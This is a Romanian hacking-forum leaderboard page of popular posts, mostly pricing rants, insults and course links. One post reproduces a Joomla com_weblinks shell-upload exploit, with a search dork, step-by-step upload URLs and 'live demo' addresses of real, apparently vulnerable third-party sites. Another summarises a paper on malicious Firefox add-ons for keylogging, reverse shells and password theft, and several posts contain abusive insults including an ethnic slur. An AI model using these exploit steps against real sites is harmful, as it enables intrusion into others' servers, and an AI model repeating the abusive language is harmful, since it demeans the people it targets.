Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 11/21/16 in all areas

  1. Ca sa priceapa toata lumea. Pretul final al unui produs este compus din pretul de fabricatie + profitul fabricantului + profitul intermediarului + pretul transportului + taxe vamale, acize, tva + comisioane procesator plati + alte taxe (exemplu taxa verde). Intrucat taxele, acizeele si tva nu scad, singurele componente care pot fi reduse sunt adausul comerciantului si profitul fabricantului.Fabricantul reduce profitul pentru a scapa de stocuri in cazul lipsei cererii, iesirii din fabricatie a unui model/produs invechit, etc, insa nu veti vedea preturi "reduse cu x%" decat in reclame. Astfel, eu, magazinul pulimag, cumpar produsul pulenkur cu 10 unitati monetare, ai stabilesc un adaus comercial de 300%, al listez la pretul de vanzare 30 unitati monetare, si ai aplic o reducere de 50%. In concluzie, al vand cu 15 unitati monetare, si babuinii se ingramadesc sa cumpere cu 15 produsul care costa 30.Daca ar fii publicate preturile de vanzare la poarta fabricii ati avea surprize sa constatati ca un produs pe care ati platit 15 unitati monetare la magazinul online la poarta fabricii se vinde cu 3 unitati monetare. Restul sunt toate rahaturile amintite mai sus, si cel mai mare rahat este "partea statului", adica taxe, tva, acizee, alte taxe, etc.
    4 points
  2. Esti varza. Daca te conectezi la un wireless, fie el securizat sau nu, cineva interesat poate intercepta/decripta datele. Ce intelegi prin "datele personale" ? crezi ca daca iti intercepteaza cineva traficul de pornache si cancanul + antena 3 iti decripteaza din traficul ala cnp-ul si adresa? sau iti fura prajiturile si datele de acces la mail, facebook si saitul facultatii? Pune mana si invata despre networking, sharing, http, https, cookies, etc, nu intreba ca prostul. Toate cunostiintele tale in materie de computere si internet se pare ca le-ai "asimilat" de la tv, de la stirile de la ora 17 dupa cum pui intrebarile. Stii sa spargi o parola wireless prin metoda Backtracking dar este ineficienta? Ce inseamna ineficienta? Detaliaza putin metoda asta de o stii, sa vedem ce si cum faci, apoi te invatam cum sa devii mai eficient. De unde puii mei veniti de sunteti asa retardati?
    2 points
  3. https://www.humblebundle.com/lifehacker-software-bundle
    1 point
  4. ################################################################ # Exploit Title : Joomla com_weblinks Shell Upload Vulnerability # Exploit Author : howucan # Website : http://howucan.gr # Dork : allinurl:/index.php?option e_name jform_description asset=com_weblinks # Software link : http://extensions.joomla.org/extensions/extension/official-extensions/weblinks # Tested on: [ Kali Linux 2 ] # Date: 2016/07/24 # video Proof : https://www.youtube.com/watch?v=rHM8XJUhBzQ # ###################### # [+] PoC : ###################### # 1 Select A Website From The Dork Above # 2 http://localhost/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # 3 Just Upload your Shell or Txt or Image to Upload Field # 4 Shell Directory : http://localhost/site/images/shell.txt # Ex http://www.verenikelife2009.gr/images/a.txt ###################### # [+] Live Demo: # http://www.orrca.org.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://egyptfuntours.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://englishshotokan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= ################################################################# via
    1 point
  5. Imi place cum te tavalesti in chinuri. Copil prost
    1 point
  6. Build an Advanced Keylogger using C++ for Ethical Hacking! https://www.udemy.com/how-to-create-an-advanced-keylogger-from-scratch-for-windows/?couponCode=PROMOCOUPONS24 Learn and Understand C++ https://www.udemy.com/learn-c-plus-plus-from-beginner-to-advanced/?couponCode=PROMOCOUPONS24 Learn Angular 2 from Beginner to Advanced https://www.udemy.com/learn-angular-2-from-beginner-to-advanced/?couponCode=PROMOCOUPONS24
    1 point
  7. Țâțe = lim (înălțime/greutate) = cam slăbuț. Altfel spus, ferește-te să dai asemenea detalii pe un forum care se vrea (a fost odată) a fi unul de securitate și încearcă să postezi chestii utile, legate de nișa asta pentru că mi-am dat facepalm când am văzut prima ta postare. "Succesuri!"
    1 point
  8. Esti ori prost ori mincinos, sau poate chiar ambele. Zici ca ai un server de metin... pai daca e "serverul" tau, de ce nu extragi userii si parolele din db?Aici avem varianta ca esti prost, si habar nu ai ce e db-ul. Daca erai nestiutor, dar inteligent cautai pe google ce si cum. Daca nu este serverul tau esti mincinos.Pe de alta parte, tu nu ai nume, de trebuie sa folosesti ca nick numele prietenei? Sinteza: esti un pizdificat mincinos si prost, putin analfabet (asta rezulta din analiza gramaticala a postului tau) care habar nu are pe ce lume traieste.Lasa IT-ul, mergi si inscrie-te intr-un partid politic, lipeste niste afise, si vei ajunge deputat, vei putea fura multe, inclusiv conturi de metin. Da-te-n sloboz de tigan.
    1 point
  9. Abusing, Exploiting and Pwning with Firefox Add-ons Ajin Abraham AJINABRAHAM.COM www.keralacyberforce.in ajin25@gmail.com Abstract This paper discuss about a number of ways through which hackers can use Mozilla Firefox as a platform to run there malicious piece of code with all the privileges and features as that supported by any native programming languages. Also there is an advantage that these malicious codes remain stealthy and undetected against anti-virus solutions. Malicious Firefox add-ons can be coded to serve this purpose. Mozilla Firefox Browser Engine acts just like a compiler or interpreter to execute your codes without much security concerns. The coding technologies for add-on development can be abused and exploited to create malicious add-ons. This paper explains how Firefox’s insecure policies and add-on development technologies like JavaScript, CORS, Web Socket, XPCOM and XPConnect can be abused by a hacker for malicious purposes. The widely popular browser add-ons can be utilized by hackers to implement new malware attack vectors. This paper is supported by proof of concept add-ons which are developed by exploiting the weakness in Firefox add-on coding. The proof of concept includes the implementation of a local keylogger, a remote keylogger, spawning a reverse shell, stealing the Firefox user session data, stealing Linux password files and Distributed Denial of Service (DDoS) Attack. All of these attack vectors are fully undetectable against anti-virus solutions and can bypass filters or protection mechanisms. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/24541.pdf
    1 point
  10. 1 point
  11. Cum sa devii un programator: -renunti la femeie -renunti la scoala -renunti la iesiri -renunti la munca; Apoi: -inveti sa inveti; -inveti sa intelegi; -inveti sa bagi la cap ce intelegi; Dupa care: - pseudo-cod; - C; -C++; -C#; -Java; -Python ... Iar la final: - in sfarsit esti mandru si te poti lauda ca stii programare, dar la ce bun ? Nu mai ai femeie
    1 point
×
×
  • Create New...